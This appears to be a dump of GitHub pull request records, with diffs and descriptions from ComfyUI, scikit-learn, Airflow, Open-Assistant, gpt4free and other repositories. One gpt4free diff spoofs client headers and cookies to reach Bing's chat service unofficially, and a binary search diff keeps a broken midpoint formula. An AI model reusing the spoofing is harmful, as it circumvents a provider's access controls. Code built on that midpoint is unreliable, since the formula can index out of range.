| https://api.github.com/repos/scikit-learn/scikit-learn/pulls/7357 | 2016-09-07T21:59:47Z | 2016-09-08T00:07:40Z | 2016-09-08T00:07:40Z | 2016-09-08T14:57:29Z | 2,379 | scikit-learn/scikit-learn | 46,597 |
Editattention setting | diff --git a/web/extensions/core/editAttention.js b/web/extensions/core/editAttention.js
index fe395c3cac..d124a3b725 100644
--- a/web/extensions/core/editAttention.js
+++ b/web/extensions/core/editAttention.js
@@ -2,10 +2,21 @@ import { app } from "/scripts/app.js";
// Allows you to edit the attention weight by holding ctrl (or cmd) and using the up/down arrow keys
-const id = "Comfy.EditAttention";
app.registerExtension({
-name:id,
+ name: "Comfy.EditAttention",
init() {
+ const editAttentionDelta = app.ui.settings.addSetting({
+ id: "Comfy.EditAttention.Delta",
+ name: "Ctrl+up/down precision",
+ type: "slider",
+ attrs: {
+ min: 0.01,
+ max: 2,
+ step: 0.01,
+ },
+ defaultValue: 0.1,
+ });
+
function incrementWeight(weight, delta) {
const floatWeight = parseFloat(weight);
if (isNaN(floatWeight)) return weight;
@@ -58,7 +69,7 @@ name:id,
function editAttention(event) {
const inputField = event.composedPath()[0];
- const delta = 0.025;
+ const delta = parseFloat(editAttentionDelta.value);
if (inputField.tagName !== "TEXTAREA") return;
if (!(event.key === "ArrowUp" || event.key === "ArrowDown")) return;
@@ -107,7 +118,7 @@ name:id,
// Increment the weight
const weightDelta = event.key === "ArrowUp" ? delta : -delta;
const updatedText = selectedText.replace(/(.*:)(\d+(\.\d+)?)(.*)/, (match, prefix, weight, _, suffix) => {
- return prefix + incrementWeight(weight, weightDelta) + suffix;
+ return prefix + incrementWeight(weight, weightDelta) + suffix;
});
inputField.setRangeText(updatedText, start, end, "select");
| Defaults to `0.1`.
 | https://api.github.com/repos/comfyanonymous/ComfyUI/pulls/533 | 2023-04-18T00:48:56Z | 2023-04-18T06:22:05Z | 2023-04-18T06:22:05Z | 2023-04-18T07:11:53Z | 454 | comfyanonymous/ComfyUI | 17,960 |
[MRG] DOC Fix Documentation in develop.rst | diff --git a/doc/developers/develop.rst b/doc/developers/develop.rst
index 186040b32ebd8..53dd0ca47824d 100644
--- a/doc/developers/develop.rst
+++ b/doc/developers/develop.rst
@@ -696,6 +696,7 @@ The following example should make this clear::
def __init__(self, n_components=100, random_state=None):
self.random_state = random_state
+ self.n_components = n_components
# the arguments are ignored anyway, so we make them optional
def fit(self, X=None, y=None):
@@ -703,7 +704,7 @@ The following example should make this clear::
def transform(self, X):
n_samples = X.shape[0]
- return self.random_state_.randn(n_samples, n_components)
+ return self.random_state_.randn(n_samples, self.n_components)
The reason for this setup is reproducibility:
when an estimator is ``fit`` twice to the same data,
| The example at the bottom of the develop page does crash when executing it. A parameter is passed to the constructor, but never added to the object, yet referenced in one of it's methods. I simply added the parameter to the object and updated it's reference.
--------
This is my first contribution, heard on the Banana Data Podcast that even small PR's are welcome and it's best to start with documentation. So here you go :smile: | https://api.github.com/repos/scikit-learn/scikit-learn/pulls/17613 | 2020-06-16T18:03:37Z | 2020-06-16T18:11:58Z | 2020-06-16T18:11:58Z | 2020-06-16T18:13:07Z | 229 | scikit-learn/scikit-learn | 46,699 |
add type hints to binary_search.py script | diff --git a/coding/python/binary_search.py b/coding/python/binary_search.py
index c8186aea1..168d10b42 100644
--- a/coding/python/binary_search.py
+++ b/coding/python/binary_search.py
@@ -1,14 +1,15 @@
#!/usr/bin/env python
import random
+from typing import List
-def binary_search(arr, lb, ub, target):
+def binary_search(arr: List[int], lb: int, ub: int, target: int) -> int:
"""
A Binary Search Example which has O(log n) time complexity.
"""
if lb <= ub:
- mid = ub + lb // 2
+ mid: int = ub + lb // 2
if arr[mid] == target:
return mid
elif arr[mid] < target:
@@ -20,8 +21,8 @@ def binary_search(arr, lb, ub, target):
if __name__ == '__main__':
- rand_num_li = sorted([random.randint(1, 50) for _ in range(10)])
- target = random.randint(1, 50)
+ rand_num_li: List[int] = sorted([random.randint(1, 50) for _ in range(10)])
+ target: int = random.randint(1, 50)
print("List: {}\nTarget: {}\nIndex: {}".format(
rand_num_li, target,
binary_search(rand_num_li, 0, len(rand_num_li) - 1, target)))
| Type hints have been supported in Python since version 3.5.
They help the client in using the function appropriately. | https://api.github.com/repos/bregman-arie/devops-exercises/pulls/222 | 2022-04-25T22:57:54Z | 2022-04-26T04:36:58Z | 2022-04-26T04:36:58Z | 2022-04-26T04:36:58Z | 337 | bregman-arie/devops-exercises | 17,611 |
inference: allow user change chat title | diff --git a/inference/full-dev-setup.sh b/inference/full-dev-setup.sh
index 4a6a10cada..1c73e1de39 100755
--- a/inference/full-dev-setup.sh
+++ b/inference/full-dev-setup.sh
@@ -30,7 +30,7 @@ fi
tmux split-window -h
tmux send-keys "cd server" C-m
-tmux send-keys "LOGURU_LEVEL=$LOGLEVEL POSTGRES_PORT=5732 REDIS_PORT=6779 DEBUG_API_KEYS='0000,0001' ALLOW_DEBUG_AUTH=True uvicorn main:app" C-m
+tmux send-keys "LOGURU_LEVEL=$LOGLEVEL POSTGRES_PORT=5732 REDIS_PORT=6779 DEBUG_API_KEYS='0000,0001' ALLOW_DEBUG_AUTH=True TRUSTED_CLIENT_KEYS=6969 uvicorn main:app" C-m
tmux split-window -h
tmux send-keys "cd text-client" C-m
tmux send-keys "sleep 5" C-m
diff --git a/inference/server/oasst_inference_server/routes/chats.py b/inference/server/oasst_inference_server/routes/chats.py
index 15b4923e13..d3b96ff567 100644
--- a/inference/server/oasst_inference_server/routes/chats.py
+++ b/inference/server/oasst_inference_server/routes/chats.py
@@ -256,3 +256,17 @@ async def handle_create_report(
except Exception:
logger.exception("Error adding report")
return fastapi.Response(status_code=500)
+
+
+@router.put("/{chat_id}/title")
+async def handle_update_title(
+ chat_id: str,
+ request: chat_schema.ChatUpdateTitleRequest,
+ ucr: deps.UserChatRepository = fastapi.Depends(deps.create_user_chat_repository),
+) -> fastapi.Response:
+ """Allows the client to update a chat title."""
+ try:
+ await ucr.update_title(chat_id=chat_id, title=request.title)
+ except Exception:
+ logger.exception("Error when updating chat title")
+ return fastapi.Response(status_code=500)
diff --git a/inference/server/oasst_inference_server/schemas/chat.py b/inference/server/oasst_inference_server/schemas/chat.py
index 42bbd2f071..ae70bf4b71 100644
--- a/inference/server/oasst_inference_server/schemas/chat.py
+++ b/inference/server/oasst_inference_server/schemas/chat.py
@@ -81,3 +81,7 @@ class MessageTimeoutException(Exception):
def __init__(self, message: inference.MessageRead):
super().__init__(f"Message {message.id} timed out")
self.message = message
+
+
+class ChatUpdateTitleRequest(pydantic.BaseModel):
+ title: pydantic.constr(max_length=100)
diff --git a/inference/server/oasst_inference_server/user_chat_repository.py b/inference/server/oasst_inference_server/user_chat_repository.py
index 8e4bf33e92..6f9df15319 100644
--- a/inference/server/oasst_inference_server/user_chat_repository.py
+++ b/inference/server/oasst_inference_server/user_chat_repository.py
@@ -20,17 +20,16 @@ async def get_chats(self) -> list[models.DbChat]:
query = query.order_by(models.DbChat.created_at.desc())
return (await self.session.exec(query)).all()
- async def get_chat_by_id(self, chat_id: str) -> models.DbChat:
- query = (
- sqlmodel.select(models.DbChat)
- .options(
+ async def get_chat_by_id(self, chat_id: str, include_messages: bool = True) -> models.DbChat:
+ query = sqlmodel.select(models.DbChat).where(
+ models.DbChat.id == chat_id,
+ models.DbChat.user_id == self.user_id,
+ )
+ if include_messages:
+ query = query.options(
sqlalchemy.orm.selectinload(models.DbChat.messages).selectinload(models.DbMessage.reports),
)
- .where(
- models.DbChat.id == chat_id,
- models.DbChat.user_id == self.user_id,
- )
- )
+
chat = (await self.session.exec(query)).one()
return chat
@@ -226,3 +225,10 @@ async def add_report(self, message_id: str, reason: str, report_type: inference.
await self.session.commit()
await self.session.refresh(report)
return report
+
+ async def update_title(self, chat_id: str, title: str) -> models.DbChat:
+ logger.info(f"Updating title of chat {chat_id=}: {title=}")
+ chat = await self.get_chat_by_id(chat_id=chat_id, include_messages=False)
+
+ chat.title = title
+ await self.session.commit()
| https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/2496 | 2023-04-13T08:36:46Z | 2023-04-13T09:08:16Z | 2023-04-13T09:08:16Z | 2023-04-13T09:08:17Z | 1,074 | LAION-AI/Open-Assistant | 37,774 | |
Handle leading slash in samba path | diff --git a/airflow/providers/samba/hooks/samba.py b/airflow/providers/samba/hooks/samba.py
index 7f846e351b10c..df46c0cf3489a 100644
--- a/airflow/providers/samba/hooks/samba.py
+++ b/airflow/providers/samba/hooks/samba.py
@@ -80,7 +80,7 @@ def __exit__(self, exc_type, exc_value, traceback):
self._connection_cache.clear()
def _join_path(self, path):
- return f"//{posixpath.join(self._host, self._share, path)}"
+ return f"//{posixpath.join(self._host, self._share, path.lstrip('/'))}"
@wraps(smbclient.link)
def link(self, src, dst, follow_symlinks=True):
diff --git a/tests/providers/samba/hooks/test_samba.py b/tests/providers/samba/hooks/test_samba.py
index 4fb36d8ca9f94..a2c45a829c973 100644
--- a/tests/providers/samba/hooks/test_samba.py
+++ b/tests/providers/samba/hooks/test_samba.py
@@ -130,3 +130,15 @@ def test_method(self, name, get_conn_mock):
# We expect keyword arguments to include the connection settings.
assert dict(kwargs, **connection_settings) == p_kwargs
+
+ @parameterized.expand(
+ [
+ ("/start/path/with/slash", "//ip/share/start/path/with/slash"),
+ ("start/path/without/slash", "//ip/share/start/path/without/slash"),
+ ],
+ )
+ @mock.patch('airflow.hooks.base.BaseHook.get_connection')
+ def test__join_path(self, path, full_path, get_conn_mock):
+ get_conn_mock.return_value = CONNECTION
+ hook = SambaHook('samba_default')
+ assert hook._join_path(path) == full_path
| Fix issue that occurs when the path to a file on a samba share has a
slash prepended to it, then the `SambaHook` will treat the path as the
host instead likely resulting trying to connect to the wrong samba host.
For example, this code:
```
hook = SambaHook('samba_test')
hook.push_from_local(
"/Sales/TestData/sometestfile.txt",
"/tmp/somefile",
)
```
resulted in:
```
airflow/providers/samba/hooks/samba.py:246: in push_from_local
with open(local_filepath, "rb") as f, self.open_file(destination_filepath, mode="wb") as g:
airflow/providers/samba/hooks/samba.py:135: in open_file
**self._conn_kwargs,
/usr/local/lib/python3.6/site-packages/smbclient/_os.py:370: in open_file
file_attributes=file_attributes, **kwargs)
/usr/local/lib/python3.6/site-packages/smbclient/_io.py:374: in __init__
tree, fd_path = get_smb_tree(path, **kwargs)
/usr/local/lib/python3.6/site-packages/smbclient/_pool.py:301: in get_smb_tree
auth_protocol=auth_protocol)
/usr/local/lib/python3.6/site-packages/smbclient/_pool.py:358: in register_session
connection.connect(timeout=connection_timeout)
/usr/local/lib/python3.6/site-packages/smbprotocol/connection.py:719: in connect
self.transport.connect()
/usr/local/lib/python3.6/site-packages/smbprotocol/transport.py:74: ValueError
ValueError: Failed to connect to 'Sales:445': [Errno -2] Name or service not known
```
<!--
Thank you for contributing! Please make sure that your code changes
are covered with tests. And in case of new features or big changes
remember to adjust the documentation.
Feel free to ping committers for the review!
In case of existing issue, reference it using one of the following:
closes: #ISSUE
related: #ISSUE
How to write a good git commit message:
http://chris.beams.io/posts/git-commit/
-->
---
**^ Add meaningful description above**
Read the **[Pull Request Guidelines](https://github.com/apache/airflow/blob/main/CONTRIBUTING.rst#pull-request-guidelines)** for more information.
In case of fundamental code change, Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvements+Proposals)) is needed.
In case of a new dependency, check compliance with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x).
In case of backwards incompatible changes please leave a note in [UPDATING.md](https://github.com/apache/airflow/blob/main/UPDATING.md).
| https://api.github.com/repos/apache/airflow/pulls/18847 | 2021-10-09T01:10:28Z | 2021-10-09T15:38:17Z | 2021-10-09T15:38:17Z | 2021-10-09T15:38:17Z | 431 | apache/airflow | 14,466 |
Index | diff --git a/g4f/Provider/Bing.py b/g4f/Provider/Bing.py
index 5b5f89aaa5..1e29c4f119 100644
--- a/g4f/Provider/Bing.py
+++ b/g4f/Provider/Bing.py
@@ -66,7 +66,7 @@ def create_async_generator(
prompt = messages[-1]["content"]
context = create_context(messages[:-1])
- cookies = {**Defaults.cookies, **cookies} if cookies else Defaults.cookies
+ cookies = {**get_default_cookies(), **cookies} if cookies else get_default_cookies()
gpt4_turbo = True if model.startswith("gpt-4-turbo") else False
@@ -146,8 +146,8 @@ class Defaults:
"streamf", "codeint", "langdtwb", "fdwtlst", "fluxprod", "deuct3"
]
- # Default cookies
- cookies = {
+def get_default_cookies():
+ return {
'SRCHD' : 'AF=NOFORM',
'PPLState' : '1',
'KievRPSSecAuth': '',
diff --git a/g4f/Provider/bing/conversation.py b/g4f/Provider/bing/conversation.py
index 388bdd6bc4..fb95e241f2 100644
--- a/g4f/Provider/bing/conversation.py
+++ b/g4f/Provider/bing/conversation.py
@@ -1,5 +1,6 @@
from __future__ import annotations
+import uuid
from aiohttp import ClientSession
class Conversation:
@@ -30,8 +31,20 @@ async def create_conversation(session: ClientSession, proxy: str = None) -> Conv
Returns:
Conversation: An instance representing the created conversation.
"""
- url = 'https://www.bing.com/turing/conversation/create?bundleVersion=1.1199.4'
+ url = 'https://www.bing.com/search?toncp=0&FORM=hpcodx&q=Bing+AI&showconv=1&cc=en'
async with session.get(url, proxy=proxy) as response:
+ response.raise_for_status()
+ headers = {
+ "accept": "application/json",
+ "sec-fetch-dest": "empty",
+ "sec-fetch-mode": "cors",
+ "sec-fetch-site": "same-origin",
+ "x-ms-client-request-id": str(uuid.uuid4()),
+ "x-ms-useragent": "azsdk-js-api-client-factory/1.0.0-beta.1 core-rest-pipeline/1.12.3 OS/Windows",
+ "referer": url
+ }
+ url = 'https://www.bing.com/turing/conversation/create?bundleVersion=1.1579.2'
+ async with session.get(url, headers=headers, proxy=proxy) as response:
try:
data = await response.json()
except:
diff --git a/image.html b/image.html
deleted file mode 100644
index d774b373e8..0000000000
--- a/image.html
+++ /dev/null
@@ -1,3 +0,0 @@
-<style type="text/css">#designer_attribute_container{display:flex;justify-content:space-between;width:100%;margin-top:10px}#designer_attribute_container .des_attr_i{width:16px;margin-right:2px}#designer_attribute_container .des_attr_txt{height:18px;line-height:18px;font-size:14px;font-weight:400;font-family:"Roboto",Helvetica,sans-serif}#designer_attribute_container #dalle_attribute_container{margin-left:auto}#designer_attribute_container #dalle_attribute_container .des_attr_dal{display:flex;justify-content:center;height:14px;border-radius:4px;background-color:#5f5f5e;padding:2px 8px}#designer_attribute_container #dalle_attribute_container .des_attr_dal_txt{height:14px;line-height:14px;font-size:11px;font-weight:400;font-family:"Roboto",Helvetica,sans-serif;color:#fff}.des_attr_txt{color:#fff}</style><div id="gir_async"
- class="giric gir_1" data-rewriteurl="/images/create/a-serene-garden-filled-with-colorful-flowers-in-fu/1-65c8a550c2d34e67a93b016cd1f3ade3?FORM=GENCRE" data-cis="512" data-vimgseturl="/images/create/async/viewimageset/1-65c8a550c2d34e67a93b016cd1f3ade3&IG=062C548EC8DD4047A2AAE63FD928194A&IID=images.vis"
- fir-th="OIG2.EPxx_.JFG402kzMQYYhj" data-ctc="Image copied to clipboard" data-wide="" data-wide-mobile=""><a class="single-img-link" target="_blank" href="/images/create/a-serene-garden-filled-with-colorful-flowers-in-fu/1-65c8a550c2d34e67a93b016cd1f3ade3?id=LrsKPoRLQud1%2bT8YdxQDhA%3d%3d&view=detailv2&idpp=genimg&FORM=GCRIDP" h="ID=images,5015.1"><img class="gir_mmimg" src="https://tse4.mm.bing.net/th/id/OIG2.EPxx_.JFG402kzMQYYhj?w=270&h=270&c=6&r=0&o=5&pid=ImgGn" alt="a serene garden filled with colorful flowers in full bloom"/></a><div id="designer_attribute_container"><img class="des_attr_i rms_img" alt="Designer" src="https://r.bing.com/rp/gmZtdJVd-klWl3XWpa6-ni1FU3M.svg" /><span class="des_attr_txt des_attr_txt_clr">Designer</span><div id="dalle_attribute_container"><div class="des_attr_dal"><span class="des_attr_dal_txt">Powered by DALL·E 3</span></div></div></div></div>
\ No newline at end of file
| https://api.github.com/repos/xtekky/gpt4free/pulls/1597 | 2024-02-17T21:37:07Z | 2024-02-17T21:37:47Z | 2024-02-17T21:37:47Z | 2024-02-18T03:19:57Z | 1,417 | xtekky/gpt4free | 38,139 | |
Update README.md | diff --git a/README.md b/README.md
index 1da3eadc0c..87dbda2f03 100644
--- a/README.md
+++ b/README.md
@@ -383,7 +383,7 @@ API | Description | Auth | HTTPS | CORS |
| [Steam](https://developer.valvesoftware.com/wiki/Steam_Web_API) | Steam Client Interaction | `OAuth` | Yes | Unknown |
| [Vainglory](https://developer.vainglorygame.com/) | Vainglory Players, Matches and Telemetry | `apiKey` | Yes | Yes |
| [Wargaming.net](https://developers.wargaming.net/) | Wargaming.net info and stats | `apiKey` | Yes | No |
-| [xkcd](https://xkcd.com/json.html) | Retrieve xkcd comics as JSON | No | Yes | Unknown |
+| [xkcd](https://xkcd.com/json.html) | Retrieve xkcd comics as JSON | No | Yes | Yes |
### Geocoding
API | Description | Auth | HTTPS | CORS |
| xkcd seems to enforce CORS | https://api.github.com/repos/public-apis/public-apis/pulls/828 | 2018-11-28T15:43:58Z | 2018-12-05T02:03:34Z | 2018-12-05T02:03:34Z | 2018-12-05T02:03:35Z | 242 | public-apis/public-apis | 35,751 |
fix(mypy) Downgrade mypy | diff --git a/requirements-dev.txt b/requirements-dev.txt
index 5278bddae8373..d66b6b9f37e18 100644
--- a/requirements-dev.txt
+++ b/requirements-dev.txt
@@ -2,7 +2,7 @@ docker>=3.7.0,<3.8.0
exam>=0.5.1
freezegun==1.1.0
honcho>=1.0.0,<1.1.0
-mypy>=0.800
+mypy>=0.800,<0.900
openapi-core @ https://github.com/getsentry/openapi-core/archive/master.zip#egg=openapi-core
pytest==6.1.0
pytest-cov==2.11.1
| Apparently mypy 0.900 is not compatible. | https://api.github.com/repos/getsentry/sentry/pulls/26473 | 2021-06-08T20:09:24Z | 2021-06-08T20:59:52Z | 2021-06-08T20:59:52Z | 2021-06-24T00:01:08Z | 169 | getsentry/sentry | 44,319 |
Bump pre-commit from 2.16.0 to 2.17.0 | diff --git a/poetry.lock b/poetry.lock
index 38171bea9..00236f63e 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -699,7 +699,7 @@ testing = ["pytest", "pytest-benchmark"]
[[package]]
name = "pre-commit"
-version = "2.16.0"
+version = "2.17.0"
description = "A framework for managing and maintaining multi-language pre-commit hooks."
category = "dev"
optional = false
@@ -1049,7 +1049,7 @@ jupyter = ["ipywidgets"]
[metadata]
lock-version = "1.1"
python-versions = "^3.6.2"
-content-hash = "656a91a327289529d8bb9135fef6c66486a192e7a7e8ed682d7c3e7bf5f7b239"
+content-hash = "52b9945e394bf17a621aafd1d844a9c2f467d0fdb28d28d68b601d1a5caf4c82"
[metadata.files]
appnope = [
@@ -1487,8 +1487,8 @@ pluggy = [
{file = "pluggy-1.0.0.tar.gz", hash = "sha256:4224373bacce55f955a878bf9cfa763c1e360858e330072059e10bad68531159"},
]
pre-commit = [
- {file = "pre_commit-2.16.0-py2.py3-none-any.whl", hash = "sha256:758d1dc9b62c2ed8881585c254976d66eae0889919ab9b859064fc2fe3c7743e"},
- {file = "pre_commit-2.16.0.tar.gz", hash = "sha256:fe9897cac830aa7164dbd02a4e7b90cae49630451ce88464bca73db486ba9f65"},
+ {file = "pre_commit-2.17.0-py2.py3-none-any.whl", hash = "sha256:725fa7459782d7bec5ead072810e47351de01709be838c2ce1726b9591dad616"},
+ {file = "pre_commit-2.17.0.tar.gz", hash = "sha256:c1a8040ff15ad3d648c70cc3e55b93e4d2d5b687320955505587fd79bbaed06a"},
]
prometheus-client = [
{file = "prometheus_client-0.12.0-py2.py3-none-any.whl", hash = "sha256:317453ebabff0a1b02df7f708efbab21e3489e7072b61cb6957230dd004a0af0"},
diff --git a/pyproject.toml b/pyproject.toml
index 4f7d8dd26..4faf29818 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -45,7 +45,7 @@ mypy = "^0.930"
pytest-cov = "^3.0.0"
attrs = "^21.4.0"
types-dataclasses = "^0.6.4"
-pre-commit = "^2.16.0"
+pre-commit = "^2.17.0"
[build-system]
requires = ["poetry-core>=1.0.0"]
| Bumps [pre-commit](https://github.com/pre-commit/pre-commit) from 2.16.0 to 2.17.0.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a href="https://github.com/pre-commit/pre-commit/releases">pre-commit's releases</a>.</em></p>
<blockquote>
<h2>pre-commit v2.17.0</h2>
<h3>Features</h3>
<ul>
<li>add warnings for regexes containing <code>[\\/]</code>.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2151">#2151</a> issue by <a href="https://github.com/sanjioh"><code>@sanjioh</code></a>.</li>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2154">#2154</a> PR by <a href="https://github.com/kuviokelluja"><code>@kuviokelluja</code></a>.</li>
</ul>
</li>
<li>upgrade supported ruby versions.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2205">#2205</a> PR by <a href="https://github.com/jalessio"><code>@jalessio</code></a>.</li>
</ul>
</li>
<li>allow <code>language: conda</code> to use <code>mamba</code> or <code>micromamba</code> via <code>PRE_COMMIT_USE_MAMBA=1</code> or <code>PRE_COMMIT_USE_MICROMAMBA=1</code> respectively.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2204">#2204</a> issue by <a href="https://github.com/janjagusch"><code>@janjagusch</code></a>.</li>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2207">#2207</a> PR by <a href="https://github.com/xhochy"><code>@xhochy</code></a>.</li>
</ul>
</li>
<li>display <code>git --version</code> in error report.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2210">#2210</a> PR by <a href="https://github.com/asottile"><code>@asottile</code></a>.</li>
</ul>
</li>
<li>add <code>language: lua</code> as a supported language.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2158">#2158</a> PR by <a href="https://github.com/mblayman"><code>@mblayman</code></a>.</li>
</ul>
</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>temporarily add <code>setuptools</code> to the zipapp.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2122">#2122</a> issue by <a href="https://github.com/andreoliwa"><code>@andreoliwa</code></a>.</li>
<li>a737d5f commit by <a href="https://github.com/asottile"><code>@asottile</code></a>.</li>
</ul>
</li>
<li>use <code>go install</code> instead of <code>go get</code> for go 1.18+ support.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2161">#2161</a> PR by <a href="https://github.com/schmir"><code>@schmir</code></a>.</li>
</ul>
</li>
<li>fix <code>language: r</code> with a local renv and <code>RENV_PROJECT</code> set.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2170">#2170</a> PR by <a href="https://github.com/lorenzwalthert"><code>@lorenzwalthert</code></a>.</li>
</ul>
</li>
<li>forbid overriding <code>entry</code> in <code>language: meta</code> hooks which breaks them.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2180">#2180</a> issue by <a href="https://github.com/DanKaplanSES"><code>@DanKaplanSES</code></a>.</li>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2181">#2181</a> PR by <a href="https://github.com/asottile"><code>@asottile</code></a>.</li>
</ul>
</li>
<li>always use <code>#!/bin/sh</code> on windows for hook script.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2182">#2182</a> issue by <a href="https://github.com/hushigome-visco"><code>@hushigome-visco</code></a>.</li>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2187">#2187</a> PR by <a href="https://github.com/asottile"><code>@asottile</code></a>.</li>
</ul>
</li>
</ul>
</blockquote>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a href="https://github.com/pre-commit/pre-commit/blob/master/CHANGELOG.md">pre-commit's changelog</a>.</em></p>
<blockquote>
<h1>2.17.0 - 2022-01-18</h1>
<h3>Features</h3>
<ul>
<li>add warnings for regexes containing <code>[\\/]</code>.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2151">#2151</a> issue by <a href="https://github.com/sanjioh"><code>@sanjioh</code></a>.</li>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2154">#2154</a> PR by <a href="https://github.com/kuviokelluja"><code>@kuviokelluja</code></a>.</li>
</ul>
</li>
<li>upgrade supported ruby versions.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2205">#2205</a> PR by <a href="https://github.com/jalessio"><code>@jalessio</code></a>.</li>
</ul>
</li>
<li>allow <code>language: conda</code> to use <code>mamba</code> or <code>micromamba</code> via
<code>PRE_COMMIT_USE_MAMBA=1</code> or <code>PRE_COMMIT_USE_MICROMAMBA=1</code> respectively.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2204">#2204</a> issue by <a href="https://github.com/janjagusch"><code>@janjagusch</code></a>.</li>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2207">#2207</a> PR by <a href="https://github.com/xhochy"><code>@xhochy</code></a>.</li>
</ul>
</li>
<li>display <code>git --version</code> in error report.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2210">#2210</a> PR by <a href="https://github.com/asottile"><code>@asottile</code></a>.</li>
</ul>
</li>
<li>add <code>language: lua</code> as a supported language.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2158">#2158</a> PR by <a href="https://github.com/mblayman"><code>@mblayman</code></a>.</li>
</ul>
</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>temporarily add <code>setuptools</code> to the zipapp.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2122">#2122</a> issue by <a href="https://github.com/andreoliwa"><code>@andreoliwa</code></a>.</li>
<li>a737d5f commit by <a href="https://github.com/asottile"><code>@asottile</code></a>.</li>
</ul>
</li>
<li>use <code>go install</code> instead of <code>go get</code> for go 1.18+ support.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2161">#2161</a> PR by <a href="https://github.com/schmir"><code>@schmir</code></a>.</li>
</ul>
</li>
<li>fix <code>language: r</code> with a local renv and <code>RENV_PROJECT</code> set.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2170">#2170</a> PR by <a href="https://github.com/lorenzwalthert"><code>@lorenzwalthert</code></a>.</li>
</ul>
</li>
<li>forbid overriding <code>entry</code> in <code>language: meta</code> hooks which breaks them.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2180">#2180</a> issue by <a href="https://github.com/DanKaplanSES"><code>@DanKaplanSES</code></a>.</li>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2181">#2181</a> PR by <a href="https://github.com/asottile"><code>@asottile</code></a>.</li>
</ul>
</li>
<li>always use <code>#!/bin/sh</code> on windows for hook script.
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2182">#2182</a> issue by <a href="https://github.com/hushigome-visco"><code>@hushigome-visco</code></a>.</li>
<li><a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2187">#2187</a> PR by <a href="https://github.com/asottile"><code>@asottile</code></a>.</li>
</ul>
</li>
</ul>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/pre-commit/pre-commit/commit/d3bdf1403d92f8cf2dc77bd99a5da42f0a6cef17"><code>d3bdf14</code></a> v2.17.0</li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/b22b313e4b042867bf0835f0e842a7281f6faf91"><code>b22b313</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2158">#2158</a> from mblayman/lua</li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/54331dca6fcfff1a06c43defb29b395898c65ce8"><code>54331dc</code></a> get lua version from luarocks itself</li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/3f8be7400d523fafe8c6d2d0fa4fb1560e7ae21d"><code>3f8be74</code></a> Add naive and untested version of Lua language support.</li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/7a305e5d9ab5e94f2d93599008d20e38f5842ac9"><code>7a305e5</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2210">#2210</a> from pre-commit/git-version</li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/c05f58b776603dc2a5222f035c2dc058426497de"><code>c05f58b</code></a> add git version to error output</li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/12b482345b4eee0153ebabbd3911614ac48d6687"><code>12b4823</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2207">#2207</a> from xhochy/mamba</li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/83aa65c4291b8a1a134cd024fbe071323f400c83"><code>83aa65c</code></a> Add mamba support to <code>language: conda</code></li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/657e76ba77ef4ae5b6e2ebe5f06cacdbf22a19a2"><code>657e76b</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/pre-commit/pre-commit/issues/2205">#2205</a> from jalessio/jamie/upgrade-rbenv</li>
<li><a href="https://github.com/pre-commit/pre-commit/commit/428dc6e46eb68065bfc115419927949cdd056811"><code>428dc6e</code></a> Update rbenv / ruby-build versions</li>
